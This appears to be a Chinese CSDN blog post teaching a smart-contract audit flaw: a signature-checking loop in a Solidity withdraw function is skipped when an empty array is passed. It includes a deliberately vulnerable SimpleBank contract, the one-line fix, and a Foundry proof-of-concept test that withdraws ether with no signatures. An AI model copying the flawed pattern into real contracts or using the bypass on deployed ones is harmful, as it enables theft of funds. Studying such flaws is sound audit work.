Solidity&Foundry 安全审计测试 空循环

最新推荐文章于 2024-07-11 15:35:40 发布
最新推荐文章于 2024-07-11 15:35:40 发布
阅读量248 收藏 5
点赞数 4
分类专栏: solidity合约那点事儿 文章标签: 安全 solidity foundry evm 智能合约 合约审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xq723310/article/details/139121352
版权

名称:空循环问题

solidityproject/vulnerable-defi at master · XuHugo/solidityproject · GitHub

描述:

由于验证不充分,攻击者只需传递一个空数组即可绕过循环和签名验证。

补救措施:

检查签名数量 require(sigs.length > 0, “No signatures provided”);

问题合约:

withdraw函数中for循环,是用来校验参数sigs的,但是如果有人传入一个空数组,那么就会直接跳过for循环的校验。

contract SimpleBank {
    struct Signature {
        bytes32 hash;
        uint8 v;
        bytes32 r;
        bytes32 s;
    }

    function verifySignatures(Signature calldata sig) public {
        require(
            msg.sender == ecrecover(sig.hash, sig.v, sig.r, sig.s),
            "Invalid signature"
        );
    }

    function withdraw(Signature[] calldata sigs) public {
        // Mitigation: Check the number of signatures
        //require(sigs.length > 0, "No signatures provided");
        for (uint i = 0; i < sigs.length; i++) {
            Signature calldata signature = sigs[i];
            // Verify every signature and revert if any of them fails to verify.
            verifySignatures(signature);
        }
        payable(msg.sender).transfer(1 ether);
    }

    receive() external payable {}
}

Foundry的测试代码:

contract ContractTest is Test {
    SimpleBank SimpleBankContract;

    function setUp() public {
        SimpleBankContract = new SimpleBank();
    }

    function testVulnSignatureValidation() public {
        payable(address(SimpleBankContract)).transfer(10 ether);
        address alice = vm.addr(1);
        vm.startPrank(alice);

        SimpleBank.Signature[] memory sigs = new SimpleBank.Signature[](0); // empty input
        //sigs[0] = SimpleBank.Signature("", 0, "", "");

        console.log(
            "Before exploiting, Alice's ether balance",
            address(alice).balance
        );
        SimpleBankContract.withdraw(sigs); // Call the withdraw function of the SimpleBank contract with empty sigs array as the parameter

        console.log(
            "Afer exploiting, Alice's ether balance",
            address(alice).balance
        );
    }

    receive() external payable {}
}

0xweb3q
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
区块链(Solidity && truffle调试)
01-20
目录来自垃圾的一篇笔记首先特别感谢两位大佬的博客有关于系统的声明有关软件及环境参考步骤安装truffle框架安装Ganache创建项目创建合约deploy配置以及编译部署调试(与合约互动) 来自垃圾的一篇笔记 ...
区块链和智能合约测试安全性.pdf
10-06
网络安全渗透测试是确保智能合约安全的关键步骤,它涉及到对代码进行深入审查、静态分析、动态分析以及多种类型的漏洞测试。 1. 代码审查:手动审核智能合约的源代码,查找可能存在的安全漏洞,如未初始化的变量、...
Solidity&Foundry 安全审计测试 脏字节
最新发布
The future is already here it's just not evenly distributed。
07-11 158
将bytes数组从memory或calldata复制到storage,是以32字节为单位进行复制的,当长度不是32的倍数,额外字节会从calldata或memory复制到storage中。存储中的脏值只有在bytes数组中进行的.push()时才可见。部署Dirtybytes合约,在合约初始化的时候,创建一个memory变量,将值赋给一个storage变量,然后使用的push,就可以看到storage的非值了;foundry 合约测试版本是0.8.0,修改为0.8.15,就不会有问题了;
Solidity&Foundry 安全审计测试 绕过isContract()校验
The future is already here it's just not evenly distributed。
07-04 477
鉴于Attack仍在其部署过程中,在isContract()方法中检查的Attack地址的extcodesize为零。依赖于extcodesize方法来实现检查存储代码的大小,我们可以确定给定地址是已部署的智能合约还是账户(EOA),但是这存在漏洞,很容易被攻击者绕过。如果目的是防止来自其他合约的调用,(tx.Origin == msg.sender)可以使用,尽管它也有缺点和潜在的漏洞。出于安全原因,某些智能合约方法被定义为只接受来自外部自有账户(EOA)的调用,而不接受来自其他智能合约的调用。
Solidity开发之Foundry快速安装(Windows版)
huanyingcool的专栏
04-19 475
Window基于VScode和WSL的Foundry安装教程
Metamask项目方给Solidity程序员的16个安全建议
FeelTouch Labs
06-23 1906
应该使用require函数来确保满足有效条件,例如输入或合约状态变量,或者验证来自外部合约调用的返回值。
solidity 循环语句
李卓书
06-20 830
solidity 循环1 while 2 do…while 3 for 注意:
07-Solidity8.0-for循环&Mapping
yyjava的专栏
06-15 556
07-Solidity8.0-for循环&MappingFor 和 While 循环 Solidity 支持for、while和do while循环。 不要编写无界循环,因为这可能会达到 gas 限制,从而导致您的交易失败。 由于上述原因,很少使用while和do while循环。映射 Map是使用语法创建的mapping(keyType => valueType)。 可以是keyType任何内置值类型、字节、字符串或任何协定。 valueType可以是任何类型,包括另一个映射或数组。 映射是不可迭代的。
solidity智能合约如何判断地址为0或
程序新视界
07-16 4608
智能合约地址判断 在旧版本中可使用以下代码来进行比较: owner != 0x0 但如果在新版本中使用,则会提示错误信息。 那么,如何正确使用来比较地址是否为呢。 解决方案 可以使用address(0)或address(0x0)来替代。因此可以如下写法: owner != address(0); // 或 owner != address(0x0); 当然,在使用操作符的时候也建议使用: ...
solidity智能合约安全 (一)
m0_73039814的博客
05-02 2234
在区块链的发展中,出现了各种各样的合约漏洞,在solidity的迭代中,虽然有部分漏洞已经修复了,但是漏洞是会一直存在的。下面我将讲诉部分合约的经典漏洞。
使用Solidity构建未来:Foundry基础模板项目
gitblog_00045的博客
06-06 654
使用Solidity构建未来:Foundry基础模板项目 项目地址:https://gitcode.com/defi-wonderland/solidity-foundry-boilerplate 在区块链领域,编写高质量的智能合约是至关重要的。为此,我们向您推荐一款由Defi Wonderland团队开发的开源项目——Solidity Foundry Boilerplate。它专为那些寻求最佳...
快速并行化的热重载Solidity测试框架
08-07
【标题】"快速并行化的热重载Solidity测试框架" 涉及的主要知识点是智能合约测试、并行化处理以及Solidity语言的热重载技术。在区块链领域,尤其是以太坊生态系统中,Solidity是编写智能合约的主要编程语言。为了...
solidity-assembly-loop:循环中的solidity语言
02-13
组装循环 请按照以下步骤完成此练习: 克隆此项目 git clone https://github.com/GeorgeBrownCollege-Toronto/Advanced-Smart-Contracts.git ./assembly-loop && cd ./assembly-loop && git filter-branch --prune-...
「漏洞分析」以太坊Solidity未初始化存储指针安全风险浅析 - web安全.zip
11-28
6. **安全测试**:进行渗透测试,模拟攻击场景,以检测和修复潜在的漏洞。 7. **智能合约保险**:考虑购买智能合约保险,以减轻因安全问题造成的财务损失。 通过深入理解这些风险和采取适当的防御措施,开发者...
solidity Dapp 积分批量投放合约
The future is already here it's just not evenly distributed。
07-11 6074
ERC20标准token投方法,网上找了一些资料都比较有限,而且通过etherscan.io发现,很多投方法都是集合到了token合约里,例如这个SIM:https://etherscan.io/address/0x86c8bf8532aa2601151c9dbbf4e4c4804e042571#code; 但是我们需要的是别人给你token合约地址,而你用自己的合约帮别人投...
solidity Dapp 多重签名合约 —— 他好,你也好
The future is already here it's just not evenly distributed。
09-12 5852
建立一个多重签名合约,这个合约可以有多个账户。每次通过这个合约转出ETH时,就需要一定数量的账户同意(例如总共有3个用户,可以设置需要2个同意)。这个应用场景也比较明显,例如公司的一份文件经常需要几个单位或部门分别签名才有效,多重签名技术就是在网络环境里解决这类问题的一种方法,用于同一文档必须经过多人的签名才有效的情形。在推广一下,个人合资创业也是一样,防止其中某个人卷钱跑路。 ...
solidity Dapp 抽奖——搏一搏,单车变摩托
The future is already here it's just not evenly distributed。
09-02 3645
最近准备做一个以太坊的抽奖游戏,今天先把合约完成。 智能合约只实现关键部分的功能,包括随机选取中奖者,存储每个人的中奖情况,以及开奖的时机; 现在我们一个一个模块来说一下; 第一个选择中奖者,这个函数的基础是生成随机数; function winnerNumber() private returns(uint) { uint winner = uint(kecc...
solidity的for循环怎么写
09-05
Solidity中的for循环可以使用两种方式来编写:一种是使用for循环语句,另一种是使用while循环语句。下面分别介绍这两种方式的写法。 1. 使用for循环语句: ```solidity for (uint i = 0; i < length; i++) { // 循环体代码 } ``` 在这个例子中,我们使用了一个名为`i`的计数器变量来控制循环的次数。循环首先初始化`i`为0,然后检查`i`是否小于`length`。如果条件满足,则执行循环体中的代码,并且在每次循环结束后递增`i`的值。 2. 使用while循环语句: ```solidity uint i = 0; while (i < length) { // 循环体代码 i++; } ``` 在这个例子中,我们首先初始化计数器变量`i`为0。然后,在每次循环开始之前,检查`i`是否小于`length`。如果条件满足,则执行循环体中的代码,并且在每次循环结束后递增`i`的值。 这两种方式都可以用来实现for循环,具体使用哪种方式取决于个人的喜好和需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xweb3q

有钱的捧个钱场,没钱的捧个人场

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值